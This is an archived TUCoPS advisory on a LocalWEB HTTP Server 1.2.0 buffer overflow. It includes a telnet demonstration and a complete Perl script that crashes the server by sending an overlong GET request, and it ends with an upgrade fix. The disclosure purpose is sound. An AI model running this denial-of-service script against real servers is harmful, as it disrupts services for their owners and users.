Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: localweb.htm

LocalWEB Buffer Overflow



Vulnerability

    LocalWEB

Affected

    LocalWEB HTTP Server 1.2.0

Description

    The  Ussr  Labs  team  has  recently  discovered a buffer overflow
    memory problem in  the LocalWEB HTTP  Server.  What  happens is by
    performing an attack  with a malformed  URL request to  port 80 it
    will cause the process containing the services to stop responding.

    The  http  Server  (Port  80)  service  has an overflow in the GET
    command:

        [hellme@die-communitech.net$ telnet example.com 80
        Trying example.com...
        Connected to example.com.
        Escape character is '^]'.
        GET /[buffer]

    Where  [buffer]  is  approx.  10000  characters,  and  the process
    containg the service crashes.

    Code in Perl:

    #!/usr/bin/perl
    #
    # ./$0.pl -s <server>
    #
    # Malformed GET URL request DoS
    #
    use Getopt::Std;
    use Socket;
    
    getopts('s:', \%args);
    if(!defined($args{s})){&usage;}
    
    my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);
    
    $foo = "A";                           # this is the NOP
    $number = "10000";                    # this is the total number of NOP
    $data .= $foo x $number;              # result of $foo times $number
    $serv = $args{s};                     # remote server
    $port =  80;                          # remote port, default is 80
    $buf = "GET /$data HTTP/1.0\r\n\r\n"; # issue this response to the
    server
    
    $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
    $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");
    
    socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
    connect(S, $paddr) ||die ("Error: $!");
    select(S); $| = 1; select(STDOUT);
    print S "$buf";
    
    print("Data has been successfully sent to $serv\n");
    
    sub usage {die("\n\n$0 -s <server>\n\n");}

Solution

    Upgrade to 2.0 here:

        http://www.west-street.co.uk/download.htm


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH